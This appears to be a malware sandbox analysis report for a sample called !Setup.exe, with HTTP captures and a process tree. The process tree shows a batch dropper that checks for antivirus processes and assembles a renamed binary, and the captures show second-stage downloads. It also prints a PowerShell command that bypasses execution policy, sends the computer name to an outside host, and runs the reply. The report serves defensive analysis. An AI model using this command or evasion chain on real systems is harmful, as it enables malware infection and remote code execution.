2024-12-27 19:24:57 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=72ecdfumicfdla0g4qqtjc2vq2; expires=Tue, 22 Apr 2025 13:11:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2FkzMRcPIJBSBCK4FwuH0YuGj9EI%2FcOCDzcNgpv2wtw9z9lL%2BX2wbWv%2F6Ns1JhDRZTixkGbwrHg1vqBI36J%2FwPEPIB7jvxmld9Jf5GlAZDZb%2B3UXaaesHk4MUB5MsEGGGQ%2BE%2Foc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb19b5b8617e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1557&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1016&delivery_rate=1770770&cwnd=232&unsent_bytes=0&cid=24b384820aa136bc&ts=794&x=0"
2024-12-27 19:24:57 UTC	218	IN	Data Raw: 64 34 0d 0a 6a 36 67 56 77 66 74 70 65 58 43 49 54 6d 61 38 6b 37 48 6a 43 4d 57 31 6e 4d 48 64 41 59 4d 2f 64 5a 4b 2b 6a 4f 55 75 6f 55 50 55 30 7a 65 30 32 56 4e 62 47 50 77 36 46 73 2b 70 37 63 78 55 36 74 62 35 70 71 67 76 38 46 63 61 34 75 4b 6a 33 52 75 57 64 37 32 65 4a 2f 58 50 58 79 56 66 2b 43 5a 49 79 4f 76 46 77 53 54 6e 30 2b 6a 6a 35 7a 4f 76 48 52 43 77 68 4c 32 59 41 74 70 68 2b 6f 6f 76 34 35 4d 64 44 51 44 37 64 44 71 54 7a 35 36 49 5a 4b 7a 46 36 72 53 77 61 50 42 4b 48 4c 7a 4e 35 49 70 65 2f 57 7a 6d 78 6d 47 65 6d 41 55 4a 4c 2f 73 6d 42 35 4c 6e 79 5a 63 71 36 5a 66 36 74 66 38 37 73 78 4e 58 39 35 79 32 31 56 50 38 0d 0a Data Ascii: d4j6gVwftpeXCITma8k7HjCMW1nMHdAYM/dZK+jOUuoUPU0ze02VNbGPw6Fs+p7cxU6tb5pqgv8Fca4uKj3RuWd72eJ/XPXyVf+CZIyOvFwSTn0+jj5zOvHRCwhL2YAtph+oov45MdDQD7dDqTz56IZKzF6rSwaPBKHLzN5Ipe/WzmxmGemAUJL/smB5LnyZcq6Zf6tf87sxNX95y21VP8
2024-12-27 19:24:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49803	185.161.251.21	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:59 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-27 19:25:00 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Fri, 27 Dec 2024 19:24:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-27 19:25:00 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49810	104.21.37.128	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:25:01 UTC	206	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipvumisui.shop
2024-12-27 19:25:02 UTC	902	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:25:01 GMT Content-Type: text/plain Content-Length: 12191445 Connection: close Accept-Ranges: bytes ETag: "34b63f16f994365a2fc9263e87cd28e8" Last-Modified: Fri, 27 Dec 2024 11:15:21 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teYSp%2FjYDF6oeWM1L1rVYcK6qa8bAhbFBJ1YPg6xliPyKSe68Axwl%2B0cQFY1nMcffDd82sAkjMelfPPi9ZW1aiWrUJlEmZeFqRmoR9KpjERNNaJJLU%2FS7VVhz8hvN3aSSGXY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb1b60d8a1895-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1522&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1918528&cwnd=185&unsent_bytes=0&cid=695a9a57bd8e39d2&ts=634&x=0"
2024-12-27 19:25:02 UTC	467	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 Data Ascii: HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JCla
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 Data Ascii: onstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUStrin
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce
2024-12-27 19:25:02 UTC	1369	IN	Data Raw: 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCo

Target ID:	0
Start time:	14:23:59
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\!Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\!Setup.exe"
Imagebase:	0x400000
File size:	73'410'647 bytes
MD5 hash:	0981C44A10CC0831FF1223AA55383192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:24:00
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:24:00
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:24:00
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x770000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:24:00
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xb80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:24:01
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x770000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:24:01
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xb80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:24:02
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 243714
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:24:02
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Applied
Imagebase:	0xca0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:24:02
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "surround" Somehow
Imagebase:	0xb80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:24:03
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Directors + ..\Tongue + ..\Banks + ..\Convenient + ..\Mainland + ..\Abilities + ..\Mainstream L
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:24:03
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\243714\Publisher.com
Wow64 process (32bit):	true
Commandline:	Publisher.com L
Imagebase:	0x6c0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:24:03
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xa00000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:24:59
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0xdb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:24:59
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:25:20
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"
Imagebase:	0xd90000
File size:	12'191'445 bytes
MD5 hash:	34B63F16F994365A2FC9263E87CD28E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 16%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:25:21
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$40472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"
Imagebase:	0x300000
File size:	3'367'424 bytes
MD5 hash:	A62041070E18901131CBBE7825EC4EC7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:25:23
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT
Imagebase:	0xd90000
File size:	12'191'445 bytes
MD5 hash:	34B63F16F994365A2FC9263E87CD28E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	14:25:23
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$50472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT
Imagebase:	0xbb0000
File size:	3'367'424 bytes
MD5 hash:	A62041070E18901131CBBE7825EC4EC7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

